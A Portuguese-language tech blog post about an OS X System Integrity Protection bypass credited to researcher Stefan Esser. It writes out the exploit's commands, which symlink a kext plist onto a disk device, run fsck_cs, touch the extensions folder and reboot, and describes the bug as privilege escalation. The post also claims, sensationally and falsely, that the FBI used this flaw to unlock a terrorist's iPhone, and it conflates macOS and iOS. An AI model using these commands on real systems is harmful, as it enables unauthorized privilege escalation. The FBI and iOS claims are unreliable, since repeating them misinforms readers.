Aqui tens o exploit que o FBI usou para entrar no iPhone (e sabes que mais? ainda funciona!)

Tens as últimas versões do software da Apple? Ou seja, o OS X 10.11.4? e o iOS 9.3? Então ainda estás vulnerável.

Desta vez, a Apple, que já tinha conhecimento do problema, decidiu não corrigir uma vulnerabilidade que afecta 130 milhões de utilizadores.

Leste bem. 130 milhões.

A vulnerabilidade foi usada pelo FBI para terminar a “batalha legal” que estava a ser feita com a Apple para que esta fosse obrigada a desbloquear um iPhone de um terrorista. Neste momento ninguém está seguro com produtos Apple.

 

O exploit

O código cabe num tweet e tem menos de 140 caracteres. Stefan Esser, um investigador de segurança da Alemanha, publicou um tweet onde se encontra o código.

 


 

O código traduz-se na prática para:

ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX

fsck_cs /dev/diskX 1>&-

touch /Library/Extensions/

Reboot

 

Que vulnerabilidade é esta?

Esta é uma vulnerabilidade relativa à escalabilidade de privilégios em iOS e OS X. Permite que um determinado processo corra sem estar devidamente autorizado para o efeito. Ou seja, por não te privilégios (privilégios esses que são dados, por vezes, quando o telefone é desbloqueado).

Foi desta forma que o FBI conseguiu desbloquear o iPhone de um terrorista há alguns dias, recorrendo a uma falha no System Integrity Protection (SIP), que devia proteger as acções da conta “root” em determinadas partes do sistema operativo… e que pelos vistos não o protege como devia.  Existem várias formas de executar o código acima descrito, como esta, entre outras. O uso do exploit num telefone que não seja teu é obviamente ilegal e deve ser feito por pessoas experientes.

 

Compra aqui a tua VPN
Partilhe no Facebook

Floating Widgets